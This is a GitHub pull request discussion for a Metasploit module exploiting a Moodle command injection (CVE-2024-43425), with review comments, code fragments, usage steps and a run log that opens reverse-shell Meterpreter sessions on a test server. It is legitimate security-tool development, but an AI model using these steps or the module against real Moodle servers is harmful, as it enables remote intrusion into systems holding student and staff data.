-
Notifications
You must be signed in to change notification settings - Fork 14.1k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Moodle RCE (CVE-2024-43425) Module #19430
Conversation
placeholder for CVE-2024-43425
end | ||
print_good('Server reachable.') | ||
|
||
moodlesession = res.get_cookies.scan(/MoodleSession=([^;]+)/).flatten[0] |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Would you be able use 'keep_cookies' => true
instead of manually extracting moodlesession
?
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
In this case I had issues getting it to work with keep_cookies
, as sometimes an expected cookie was not present in the order the requests are being sent to the server, if I remember correctly.
'mform_isexpanded_id_multitriesheader' => '0', | ||
'mform_isexpanded_id_tagsheader' => '0', | ||
'category' => "#{category},#{course_context_id}", | ||
'name' => 'XXXXXXXXXXXXXXXX', |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Could this, and maybe some of the other values being sent here, be randomized?
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Yes, I used hardcoded values to get an initial PoC working. I'll see which ones I can randomize and update the code accordingly.
Hello teacher, I found that the 6.4.26 version of msfconsole does not integrate this vulnerability library, where can I get this vulnerability library? |
@ABC20236 It hasn't been merged yet. If you'd like to use it already, you can add it yourself by copying the files from this PR (located at https://github.com/rapid7/metasploit-framework/pull/19430/files). The module is still a draft, but should work. @jheysel-r7 Thank you for your feedback! Hopefully I have more time in the coming days to work through your comments (as well as for the other pending PRs) and update the module(s) accordingly. |
Teacher, thank you so much for your help, I used the file you provided to test locally, but I encountered the following problem, due to limited ability, I hope to get your help. |
Thank you for reporting the bug. Can you please enter As this module is still a draft, it has a couple issues with handling error cases, missing code optimizations, etc. |
Awesome, let us know if you need any help getting it over the line for landing 🎉 |
@adfoster-r7 Thank you, I appreciate it. I'll try to provide an update this week. |
Finally pushed some (minor) updates.
@adfoster-r7 If you or someone else from your team has some cycles to help get this merged, that would be great. I probably won't have much time left this year to work on modules. |
Hello @h4x-x0r, so the exploit is working fine and I think the module is well written, I noticed couple of things I would like to address with you: running
If we run
|
Thank you for testing and reviewing the module, @dledda-r7! If you do find out how to better catch the incoming meterpreter session, please do let me know, as I encountered the same issue in a couple other modules I've been working on. |
Regarding the first issue I am gonna try to add a timeout in the request that hang to see if we can get the session without displaying the "no session created". Regarding the second issue I wouldn't really bother myself... looks like the command is executed two times from moodle side and i don't think is a blocker, two session is better than zero 😂 |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
The module looks good! thanks @h4x-x0r!
msf6 exploit(linux/http/moodle_rce) > exploit
[*] Started reverse TCP handler on 172.30.50.186:4444
[*] Obtaining MoodleSession and logintoken...
[+] Server reachable.
[*] Authenticating as super-teacher...
[*] Successfully authenticated.
[*] Obtaining sesskey, courseContextId, and category...
[*] Injecting command...
[*] Sending stage (3045380 bytes) to 172.30.56.159
[*] Meterpreter session 6 opened (172.30.50.186:4444 -> 172.30.56.159:42412) at 2024-12-05 04:29:47 -0500
[*] Sending stage (3045380 bytes) to 172.30.56.159
[*] Meterpreter session 7 opened (172.30.50.186:4444 -> 172.30.56.159:42426) at 2024-12-05 04:29:47 -0500
meterpreter > sysinfo
Computer : 172.30.56.159
OS : Ubuntu 24.04 (Linux 6.8.0-49-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > getuid
Server username: www-data
meterpreter >
Release NotesThis adds an exploit module for Moodle learning platform. The module exploits a command injection vulnerability in Moodle CVE-2024-43425 to obtain remote code execution. By default, the application will run in the context of www-data, so only a limited shell can be obtained. |
Awesome, thank you! |
This is a new module which exploits a command injection vulnerability in Moodle (CVE-2024-43425) to obtain remote code execution. By default, the application will run in the context of www-data, so only a limited shell can be obtained.
Valid credentials are required to exploit this vulnerability. Moreover, the user must be authorized to either add a new or modify an existing quiz, in order to reach the vulnerable function and trigger the bug. User roles that fall into this category include
Teacher
andAdministrator
, but might differ depending on the specific deployment and configuration.Verification Steps
Teacher
) and assign it to the previously created course.<IP>/moodle/course/view.php?id=3
).IP>/moodle/mod/quiz/edit.php?cmid=4
).msfconsole
use exploit/linux/http/moodle_rce
set USERNAME <USER>
set PASSWORD <PASSWORD>
set CMID <ID>
set COURSEID <ID>
set RHOSTS <IP>
set LHOST <IP>
exploit
Notes
Obtaining the course ID and course module ID has to be done manually by the user running the module. While it could be automated, there are too many variables to consider (multiple courses, multiple quizzes, specific configurations of these, specific permissions assigned to the given user, etc.). Since it is fairly trivial to obtain these from the address bar while browsing Moodle, it shouldn't be a big burden for the user.
I played around with different timeouts and similar properties, but the current draft of the module always results in a shell that isn't directly caught when the module is executed:
While it's not a big issue to manually select the session, it would be nicer if it gets caught while running the module. Is there a specific MSF directive or property I can add to make this more reliable in my module?
Currently no
check
method is implemented, as I didn't see an endpoint that returns the version details to an unauthenticated user.I'm leaving it as a draft for now, as I still want to do some cleanup and improvements, as well as incorporate some of the feedback that I got in other PRs that apply here too. However, the current code should work in the majority of cases as is, in case someone would like to test it already.